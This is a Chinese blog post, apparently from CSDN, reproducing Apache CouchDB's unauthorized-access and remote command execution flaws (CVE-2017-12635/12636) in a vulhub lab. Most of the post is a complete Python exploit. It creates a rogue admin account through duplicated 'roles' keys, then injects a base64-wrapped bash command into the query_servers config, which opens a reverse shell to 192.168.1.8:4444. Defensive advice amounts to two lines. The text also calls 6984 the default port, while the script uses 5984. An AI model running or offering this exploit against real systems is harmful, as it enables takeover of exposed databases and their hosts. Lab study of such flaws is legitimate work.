CouchDB 未授权访问漏洞总结

最新推荐文章于 2024-06-18 16:01:59 发布
最新推荐文章于 2024-06-18 16:01:59 发布
阅读量1.1k 收藏 2
点赞数
分类专栏: 未授权访问 文章标签: 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45746681/article/details/108933389
版权

提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档

文章目录

前言

复现常见的未授权访问漏洞 加强理解

一、CouchDB 未授权访问漏洞是什么?

Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库"。它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。应用广泛,如BBC用在其动态内容展示平台,Credit Suisse用在其内部的商品部门的市场框架,Meebo,用在其社交平台(web和应用程序)。

在2017年11月15日,CVE-2017-12635和CVE-2017-12636披露,CVE-2017-12636是一个任意命令执行漏洞,我们可以通过config api修改couchdb的配置query_server,这个配置项在设计、执行view的时候将被运行。默认端口是6984

影响版本:小于 1.7.0 以及 小于 2.1.1

二、复现

1.搭建环境

依旧用vulhub搭建环境,相应命令与之前写的文章类似

在这里插入图片描述

2.漏洞反弹shell的exp

代码如下(示例):

#!/usr/bin/env python3
import requests
import json
import base64
from requests.auth import HTTPBasicAuth

target = 'http://192.168.1.8:5984'
command = rb"""sh -i >& /dev/tcp/192.168.1.8/4444 0>&1"""
version = 1

session = requests.session()
session.headers = {
    'Content-Type': 'application/json'
}
# session.proxies = {
#     'http': 'http://127.0.0.1:8085'
# }
session.put(target + '/_users/org.couchdb.user:wooyun', data='''{
  "type": "user",
  "name": "wooyun",
  "roles": ["_admin"],
  "roles": [],
  "password": "wooyun"
}''')

session.auth = HTTPBasicAuth('wooyun', 'wooyun')

command = "bash -c '{echo,%s}|{base64,-d}|{bash,-i}'" % base64.b64encode(command).decode()
if version == 1:
    session.put(target + ('/_config/query_servers/cmd'), data=json.dumps(command))
else:
    host = session.get(target + '/_membership').json()['all_nodes'][0]
    session.put(target + '/_node/{}/_config/query_servers/cmd'.format(host), data=json.dumps(command))

session.put(target + '/wooyun')
session.put(target + '/wooyun/test', data='{"_id": "wooyuntest"}')

if version == 1:
    session.post(target + '/wooyun/_temp_view?limit=10', data='{"language":"cmd","map":""}')
else:
    session.put(target + '/wooyun/_design/test', data='{"_id":"_design/test","views":{"wooyun":{"map":""} },"language":"cmd"}')

结果如下
在这里插入图片描述

防御方法

绑定指定ip。
设置访问密码

qq_45746681
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
13 - vulhub - Couchdb 任意命令执行漏洞(CVE-2024-12636)
04-16 821
这是我花了几天的时间去把Python所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。基本上主流的和经典的都有,这里我就不放图了,版权问题,个人看看是没有问题的。
授权访问CouchDB 授权访问漏洞
qq_68163788的博客
05-18 471
Apache CouchDB是一个开源数据库,应用广泛,如BBC用在其动态内容展示平台,Credit Suisse用在其内部的商品部门的市场框架,Meebo,用在其社交平台(web和应用程序),默认会在5984端口开放Restful的API接口,如果使用SSL的话就会监听在6984端口,用于数据库的管理功能。 其HTTP Server默认开启时没有进行验证,而且绑定在0.0.0.0,所有用户均可通过API访问导致授权访问
常见授权访问漏洞总结
weixin_50464560的博客
10-02 2290
本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。 常见的授权访问漏洞: Redis 授权访问漏洞 MongoDB 授权访问漏洞 Jenkins 授权访问漏洞 Memcached 授权访问漏洞 JBOSS 授权访问漏洞 VNC 授权访问漏洞 Docker 授权访问漏洞 ZooKeeper 授权访问漏洞 Rsync 授权访问漏洞 Atlassian Crowd 授权访问漏洞 CouchDB 授权访问漏洞 Elasticsearch...
授权访问漏洞总结
最新发布
m0_64481831的博客
06-18 1085
以下总结了常见的授权访问漏洞,还在持续更新中,遇到就会补充。欢迎大家关注~
授权访问漏洞汇总
weixin_46137328的博客
09-23 7500
本文共11695个字,可以先收藏后看。漏洞概览: Elasticsearch授权访问漏洞 Hadoop授权访问漏洞 Jenkins授权访问 MongoDB授权访问 Zoo...
授权访问漏洞总结(redis,couchdb,jenkins,mongo,Elasticsearch,Memcache,Docker)
u011790603的博客
07-21 419
0x01 介绍 Copy from https://paper.seebug.org/409/ 授权访问可以理解为需要安全配置或权限认证的地址、授权页面存在缺陷,导致其他用户可以直接访问,从而引发重要权限可被操作、数据库、网站目录等敏感信息泄露。 目前主要存在授权访问漏洞的有:NFS 服务,Samba 服务,LDAP,Rsync,FTP,GitLab,Jenkins,MongoDB,Redis...
【应急类漏洞】————1、授权访问漏洞总结
Fly_鹏程万里
03-07 3757
前言 2018年5月,比特币勒索病毒 WannaCry 席卷全球,国内众多机构部门计算机系统瘫痪。根据之前应急响应的案例分析,以及一些安全报告统计,目前大部分的勒索病毒均利用授权访问等通用漏洞进行植入、勒索,尤其是 Redis、MongoDB 等数据库的授权访问漏洞尤其严重。参见《【脉搏译文系列】如何高效的应对勒索软件》 0x01 介绍 授权访问可以理解为需要安全配置或权限认证的地址、...
各种授权访问漏洞的复现与利用
Shanfenglan's blog
11-30 1181
文章目录1. rsync1.1 利用1. 下载文件2. 上传文件3. 上传文件拿shell2. Jupyter Noteboo2.1 利用3. hadoop3.1 利用4. CouchDB4.1 利用参考文章 1. rsync Rsync(remote synchronize)是一个远程数据同步工具,可通过 LAN/WAN 快速同步多台主机间的文件,也可以同步本地硬盘中的不同目录。Rsync 默认允许匿名访问,如果在配置文件中没有相关的用户认证以及文件授权,就会触发隐患。Rsync 的默认端口为 837。
Redis授权访问漏洞
m0_61506558的博客
09-10 838
VNC是虚拟网络控制台Virtual Network Console的英文缩写。它是一款优秀的远程控制工具软件,由美国电话电报公司AT&T的欧洲研究实验室开发。VNC是基于UNXI和Linux的免费开源软件,由VNC Server和VNC View两部分组成。VNC默认端口号为5900、5901。VNC授权访问漏洞如果被利用可能造成恶意用户直接控制target主机。
Apache CouchDB信息泄露漏洞(CVE-2023-26268)通告
05-05
Apache CouchDB 信息泄露漏洞(CVE-2023-26268)通告 Apache CouchDB 是一个开源的 NoSQL 文档数据库,以基于 JSON 的文档格式收集和存储数据,提供了高可用性和高可靠性。近日,深信服安全团队监测到 Apache ...
沙发连接器:CouchDB访问
02-18
【标题】:“沙发连接器:CouchDB访问器” CouchDB访问器是针对CouchDB数据库的一个关键组件,主要用于帮助开发者在Java环境中便捷地与CouchDB进行交互。CouchDB是一种开源、分布式文档数据库,它以JSON格式存储...
couchdb:Kivik的CouchDB驱动程序
02-02
Kivik CouchDB 用于CouchDB驱动程序。 用法 该软件包提供了接口的实现。 您必须导入驱动程序,然后才能使用完整的 API。 请查阅以获取完整的文档和编码示例。 package main import ( "context" kivik "github....
unauthorized-check:扫描常见授权访问(redis,mongodb,memcached,elasticsearch,zookeeper,ftp,CouchDB,docker,Hadoop)
03-08
扫描以下常见授权访问 redis、mongodb、memcached、elasticsearch、zookeeper、ftp、CouchDB、docker、Hadoop 安装 pip3 install -r requirements.txt -i https://mirrors.aliyun.com/pypi/simple/ 使用说明 ...
Hadoop 授权访问漏洞总结
qq_45746681的博客
10-05 6107
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录前言一、Hadoop 授权访问漏洞是什么?二、复现1.搭建环境2.复现 前言 记录下常见的授权访问漏洞 一、Hadoop 授权访问漏洞是什么? Hadoop是一个由Apache基金会所开发的分布式系统基础架构,由于服务器直接在开放了 Hadoop 机器 HDFS 的 50070 web 端口及部分默认服务端口,黑客可以通过命令行操作多个目录下的数据,如进行删除,下载,目录浏览甚至命令执行等操作,产生极大的危害。 二、复现 1
ZooKeeper授权访问漏洞总结
qq_45746681的博客
10-05 4168
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录前言一、ZooKeeper授权访问漏洞?二、复现1.搭建环境2.检测方法POC编写 前言 总结下常见的授权漏洞 一、ZooKeeper授权访问漏洞? ZooKeeper是一个分布式的、开放源码的分布式应用程序协调服务,是Google的Chubby一个开源的实现,是Hadoop和Hbase的重要组件。 它是一个为分布式应用提供一致性服务的软件,提供的功能包括:配置维护、域名服务、分布式同步、组服务等。 ZooKeeper默认开
Elasticsearch 授权访问漏洞总结
qq_45746681的博客
10-05 2715
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录前言一、ElasticSearch授权访问是什么?二、复现1.搭建环境2.复现 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、ElasticSearch授权访问是什么? ElasticSearch是一个基于Lucene的搜索服务器。它提供了一个分布式多
CouchDB常用的漏洞利用方法
05-27
以下是一些常用的 CouchDB 漏洞利用方法: 1. 授权访问漏洞:如果 CouchDB 正确配置,攻击者可以轻易地访问和控制 CouchDB 服务器,从而获取敏感信息或造成破坏。 2. 认证绕过漏洞:攻击者可以利用某些漏洞或弱口令等方式,绕过身份验证机制,从而访问和控制 CouchDB 服务器。 3. 注入漏洞:攻击者可以向 CouchDB 服务器发送恶意数据,利用注入漏洞,执行任意代码,从而控制服务器。 4. 配置错误漏洞:如果 CouchDB 服务器的配置存在错误,攻击者可以利用这些错误,绕过安全措施,访问和控制 CouchDB 服务器。 5. 拒绝服务攻击漏洞:攻击者可以通过发送大量的恶意请求,或利用某些漏洞,让 CouchDB 服务器崩溃或无法响应,从而导致服务停止或数据丢失。 总之,为了保护 CouchDB 服务器的安全,需要加强对服务器的安全管理和监控,及时修补安全漏洞,提高人员的安全意识和技能。此外,建议使用更加安全的身份验证机制,例如 OAuth、LDAP 等。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值